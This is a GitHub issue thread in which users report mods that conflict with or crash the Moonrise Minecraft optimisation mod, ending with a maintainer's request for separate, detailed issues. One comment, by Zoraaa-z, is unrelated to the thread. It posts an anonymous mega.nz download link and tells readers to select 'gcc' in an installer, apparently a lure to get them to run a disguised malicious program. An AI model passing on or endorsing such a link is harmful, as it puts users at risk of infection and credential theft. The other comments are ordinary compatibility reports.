### ISSUE TITLE
Additional incompatibility mods

### ISSUE THREAD

**Issue by KITE2459** [Tuinity/Moonrise#11]
the mod loader used is fabric

[ScalableLux]
https://modrinth.com/mod/scalablelux
it doesn't work because it's a starlight fork of island that made c2me.
it says incompatibility from the server boot.

[no-portals]
https://modrinth.com/mod/no-portals

[servercore]
https://modrinth.com/mod/servercore

these mods are not on the incompatible list

thanks for developing another optimization mod

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by sternschnaube** [comment]
Any plans to make the Starlight patches optional via config to support ScalableLux @R00tB33rMan?
Since it has further optimisations.

**Comment by ImYosu** [comment]
Apparently servercore is compatible with moonrise, since 4 days ago in neo and fabric.
(https://github.com/user-attachments/assets/1b205d0a-99c3-4c51-a0c1-111adf9e7777)

**Comment by coco875** [comment]
Chunky don't generate chunk and chunk-pregenerator crash when running a benchmark or any task

**Comment by coco875** [comment]
forgematica (neoforge port of litematica) also crash like litematica on fabric

**Comment by coco875** [comment]
with connector, debugify (with some tweak), vmp crash like on fabric

**Comment by derjungeinhd** [comment]
Open Parties and Claims by Xaero and Vanish by DrexHD also seem to crash the server on fabric and it seems there are some Mixin Shenanegans with ModernFix going on

**Comment by tajemniktv** [comment]
[PotatoOptimize](https://modrinth.com/mod/potatoptimize)
LOG on mclogs

most likely this mixin: 

> mixin.random.world (true) - Replaces all references of Random in World with my implementation

**Comment by jpenilla** [comment]
Please open individual issues for each conflicting mod, including details such as the mod loader, versions, crash reports, logs, etc. Unfocused issues like this make things very difficult to take action on.
